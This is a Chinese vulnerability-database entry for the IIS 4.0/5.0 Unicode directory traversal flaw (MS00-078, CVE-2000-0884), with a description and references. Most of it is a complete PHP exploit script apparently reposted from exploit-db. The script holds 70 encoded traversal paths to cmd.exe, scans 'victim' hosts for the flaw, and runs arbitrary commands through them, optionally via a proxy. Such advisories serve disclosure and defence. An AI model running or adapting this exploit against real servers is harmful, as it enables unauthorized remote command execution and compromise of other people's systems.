Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)

Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)

漏洞ID 1106045 漏洞类型 输入验证
发布时间 2000-10-17 更新时间 2005-10-12
图片[1]-Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)-安全小百科CVE编号 CVE-2000-0884
图片[2]-Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)-安全小百科CNNVD-ID CNNVD-200012-156
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20301
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-156
|漏洞详情
IIS是Microsoft出品的一个广泛应用的InternetWeb服务器软件,随WindowsNT和Windows2000捆绑发售。默认情况下IIS的某些目录是允许通过提交HTTP请求执行可执行文件的。NSFOCUS安全小组发现IIS4.0和IIS5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些Web根目录以外的文件和程序。对于IIS5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如”%c1%hh”或者”%c0%hh”,它会首先将其解码变成:0xc10xhh,然后尝试打开这个文件,Windows系统认为0xc10xhh可能是Unicode编码,因此它会首先将其解码,如果0x00<=%hh<0x40的话,采用的解码的格式与下面的格式类似:%c1%hh->(0xc1-0xc0)*0x40+0xhh%c0%hh->(0xc0-0xc0)*0x40+0xhh因此,利用这种编码,我们可以构造很多字符,例如:%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c=’/’%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f=”攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。RainForestPuppy测试发现对于英文版的IIS4.0/5.0,此问题同样存在,只是编码格式略有不同,变成”%c0%af”或者”%c1%9c”。
|漏洞EXP
source: http://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

#!php -q
<?

$vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";

$vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[63]="/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
        if(!isset($argv[1]))
        {
                echo

"nn--------------------------------------------------------------------n";
                echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron
------n";
                echo
"--------------------------------------------------------------------nn";
                echo "Usage of the wicked device:n";
                echo $argv[0]." -t www.victim.vicn";
                echo $argv[0]." -t www.victim.vic -p proxy:portn";
                echo $argv[0]."  www.victim.vic comand variant_numbern";
                echo $argv[0]." -p proxy:port www.victim.vic comand variant_numbern";
                echo "Options:n";
                echo "-t --> Test the vulnerability (Try known variants till find the good
one)n";
                echo "-p --> Attack through proxyn";
                echo "nUse Mode:n1) Test the host and get the variants number in case
vulnerability existsn";
                echo "2) Attack with command and variants number (optionaly you can use
proxy)n";
                echo "Note : When you specify a command with spaces, replace spaces
with low script  "_" n";
                echo "and you must double the backslash "\". n
Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\inetpub 49n";
                echo "Thanks to An-tonio for the proxy support.n";
                echo "Bug discover by Anonymous Post.n";
                echo "TYPE ".$argv[0]." spanish, for Spanish help.n";
        }
        else
        {
                if($argv[1]=="spanish")
                {
                echo
"nn--------------------------------------------------------------------n";
                echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por
BoloTron ----n";
                echo
"--------------------------------------------------------------------nn";
                echo "Uso del artefacto maligno :n";

                echo $argv[0]." -t www.victima.vicn";
                echo $argv[0]." -t www.victima.vic -p proxy:puerton";
                echo $argv[0]."  www.victima.vic comando n�_de_varianten";
                echo $argv[0]." -p proxy:port www.victima.vic comand
n�_de_varianten";
                echo "Opciones:n";
                echo "-t --> Testea la vulnerabilidad, prueba todas las
variantes hasta encontrar una buena.n";
                echo "-p --> Ataque a traves de proxyn";
                echo "nModo de Empleo:n1) Testear el host y anotar el
numero de variante en caso de ser vulnerablen";
                echo "2) Atacar especificando comando y n� de variante
(opcionalmente puedes especificar un proxy)n";
                echo "Nota : Cuando se especifica un comando en el que hay
espacios hay que sustituirlos por un guion bajo _ n";
                echo "y las contrabarras hay que ponerlas dobles. nEjemplo :
".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\inetpub 49n";
                echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.n";
                echo "Bug descubierto por aviso anonimo.n";
                exit;
                }
                if($argv[1]=="-t")
                {
                        if ($argv[3]=="-p")
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $prox=explode(":",$argv[4]);
                                $comando="dir+c:\";
                                $fp = fsockopen($prox[0], $prox[1]);
                                if(!$fp)
                                {
                                        echo "Conection failed...n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0nn");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> Vulnerable!!n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> NoT Vulnerable
:(n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                        else
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $port=80;
                                $comando="dir+c:\";
                                $fp = fsockopen($argv[2], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed...n";
                                }
                                else
                                {
                                        fputs($fp,"GET
".$vector_ataque[$i]."".$comando." HTTP/1.0nn");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> vulnerable!!n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> No Vulnerable :(n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                }
                else
                {
                        if($argv[1]=="-p")
                        {
                                $prox=explode(":",$argv[2]);
                                $port=$prox[1];
                                $comando=ereg_replace("_","+",$argv[4]);
                                $fp = fsockopen($prox[0], $port);

                                if(!$fp)
                                {
                                        echo "Conection failed.n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0nn");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);

                        }
                        else
                        {
                                $port=80;
                                $comando=ereg_replace("_","+",$argv[2]);
                                $fp = fsockopen($argv[1], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed.n";
                                }
                                else
                                {
                                        fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0nn");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);
                        }
                }




        }
?>
|参考资料

来源:MS
名称:MS00-078
链接:http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
来源:XF
名称:iis-unicode-translation
链接:http://xforce.iss.net/static/5377.php
来源:BID
名称:1806
链接:http://www.securityfocus.com/bid/1806
来源:OSVDB
名称:436
链接:http://www.osvdb.org/436
来源:USGovernmentResource:oval:org.mitre.oval:def:44
名称:oval:org.mitre.oval:def:44
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:44

相关推荐: PhotoPost Script Injection Vulnerability

PhotoPost Script Injection Vulnerability 漏洞ID 1096054 漏洞类型 Input Validation Error 发布时间 2005-08-26 更新时间 2005-08-26 CVE编号 N/A CNNVD-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享